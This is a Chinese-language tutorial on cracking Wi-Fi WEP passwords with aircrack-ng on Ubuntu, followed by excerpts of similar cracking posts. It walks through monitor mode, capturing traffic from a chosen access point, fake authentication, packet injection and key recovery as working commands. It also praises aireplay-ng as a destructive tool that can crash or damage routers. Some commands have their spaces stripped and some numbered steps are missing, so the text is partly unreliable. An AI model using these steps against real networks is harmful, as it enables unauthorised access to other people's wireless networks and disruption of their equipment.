由於在windows環境下不能如linux環境下直接呼叫無線網絡卡,所以需要使用其他工具將無線網絡卡載入,以便攻擊工具能夠正常使用,在無線攻擊套裝aircrack-ng的windows版本下內建這樣的工具,就是aircrack-ng,下面給大家介紹一下在ubuntu下aircrack-ng工具包的使用。
安裝:$sudoapt-getinstallaircrack-ng
aircrack-ng無線破解工具包有很多任務具,用到的工具主要有以下幾個:
airmon-ng處理網絡卡工作模式
airodump-ng抓包
aircrack-ng破解
aireplay-ng發包,干擾
1)airmon-ng
啟動無線網絡卡進入monitor模式,
useage:airmon-ng[channel]
:啟動,停止,檢測
:指定無線網絡卡
[channel]:監聽頻道,現代大多數無線路由預設是6,隨便掃瞄一下都是這個頻道,網管們應該換換了
2)airodump-ng
抓包工具,我最喜歡用的,詳細用法如下:
usage:airodump-ng[,,...]
options:
–ivs:僅將抓取資訊儲存為.ivs
–write:儲存為指定日檔名,我一般用這個,尤其是多個網路時,指定了也好區分
–beacons:儲存所有的beacons,預設情況況下是丟棄那些無用的資料報的
filteroptions:
–encrypt:使用密碼序列過濾ap
–netmask:使用掩碼過濾ap
–bssid:使用bssid過濾ap
-a:過濾無關的客戶端
–help:顯示使用方法,翻譯到這裡,感覺還是英文的貼切一點,建議讀原文
3)aireplay-ng
搞破壞的工具,注意殺傷力很大,甚至可以損壞劣質的ap裝置(小記憶體的路由器可能會重啟,或者徹底被破壞掉),我很喜歡這個東西,相信你也會喜歡的,使用時注意分寸.
usage:aireplay-ng
filteroptions:
-bbssid:ap的mac
-ddmac:目標的mac
-ssmac:**的mac
-mlen:最小包長度
-nlen:最大包長度
-d:禁用ap發現功能
replayoptions:
-xnbpps:每秒包數量
-pfctrl:框架設定(hex)
-abssid:設定ap的mac
-cdmac:設定目標的mac
-hsmac:設定**的mac
-gvalue:改變環快取大小(預設8)
fakeauthattackoptions:
-eessid:設定目標ap的ssid
-onpckts:每秒爆破的包數量(0自動,預設1)
-qsec:存活時間秒
-yprga:共享可信的key流
–help:顯示這個幫助,這部分是全部依照我的使用來翻譯,沒有完全準確的翻譯,主要對付那些不給出作者就引用的人,鄙視抄襲.
4)aircrack-ng
破解key,漫長的過程.漫不漫長取決於兩個方面:一是網管的聰明程度(能否設定出複雜的密碼),二是電腦的速度.
usage:aircrack-ng[options]<.cap>
commonoptions:
-a:暴破(1/wep,2/wpa-psk)
-e:選擇essid為目標
-b:選擇ap的mac為目標,就是破解識別的關鍵字
-q:使用安靜模式,無數出模式
-c:將所有的ap合併為乙個虛擬的
–help:顯示這個幫助
就wep破解說明,步驟:
步驟:1.修改無線網絡卡狀態:先down掉
3.修改網絡卡工作模式:進入monitor狀態,會產生乙個虛擬的網絡卡
4.修改無線網絡卡狀態:up
5.檢視網路狀態,記錄下ap的mac和本機的mac,確定攻擊目標
6.監聽抓包:生成.cap或.ivs
8.破解.cap或.ivs,獲得wep密碼,完成破解
具體步驟:
1、首先確定是否有wlan0的無線網絡卡埠,ifconfig即可知道。若存在終端輸入sudoairmon-ngstartwlan0啟動無線網絡卡的監控模式。
3、另開乙個終端,輸入sudoairodump-ng-c6--bssidap'smac-wwepmon0(-c後面的6為ap工作頻道,--bissid後面的ap'smac是要欲破解ap的mac位址,-w後的wep的是抓下來的資料報data儲存的檔名(可以隨便取名),然後回車開始抓包。
4、再另開乙個終端,輸入sudoaireplay-ng-10-eessid-aap'smac-hmymacmon0與ap建立虛擬連線(-h後面跟著的mymac是自己的無線網絡卡的mac位址)
這裡以之前探測到的essid為p2p的為例。
5、建立虛擬連線成功後,輸入sudoaireplay-ng-2-f-p0841-cff:ff:ff:ff:ff:ff-bap'smac-hmymacmon0進行注入,現在步驟3中資料報應該不斷增長。
6、收集有5000個以上的data之後,另開乙個終端,輸入sudoaircrack-ngwep*.cap進行解密(如果沒算出來的話,繼續等,ubuntuaircrack-ng會在data每增加多5000個之後就自動再執行,直到算出密碼為至)
7、破解出密碼後在終端中輸入sudoairmon-ngstopmon0關閉監控模式,不然無線網絡卡會一直向剛剛的ap進行注入的,用ctrl+c退出或者直接關閉終端都是不行的,除非重新啟動電腦。
8、如果沒有出現意外,你應該會很高興的看到keyfound!
Aircrack ng無線破解總結
過年回來家,奈何沒網,實屬無奈,只好看破解教程,看能否破出來。於是總結如下 測試環境在linux平台下,我用的是ubuntu環境。ubuntu安裝可以直接用sudo apt get install aircrack ng 方法 1.確保你的無線是開啟的 ifconfig看是否有wlan0或別的無線介...
Ubuntu無線密碼破解 aircrack ng
想必搞過破解的朋友們都會知道bt3 bt4等linux下的無線破解工具吧,在ubuntu系統下同樣有著一款破解功能強大的工具,那就是aircrack ng。廢話不多說.我是分割線 測試平台 dell latitude e4300 ubuntu 10.10 成功 sudo apt get instal...
破解無線網 BacktrackLinux
只為興趣,曾經的黑客夢想 2011.05.10 bt linux官方 現在下了個vm版本的bt4r2,看看裡面的東西怎樣,有沒有整合那個破解工具。2011.05.11 用vm7開啟的,進去後只是命令列的啟動介面。startx 這個可以得到圖形介面 在csdn上下了個spoonwep wpa rc3....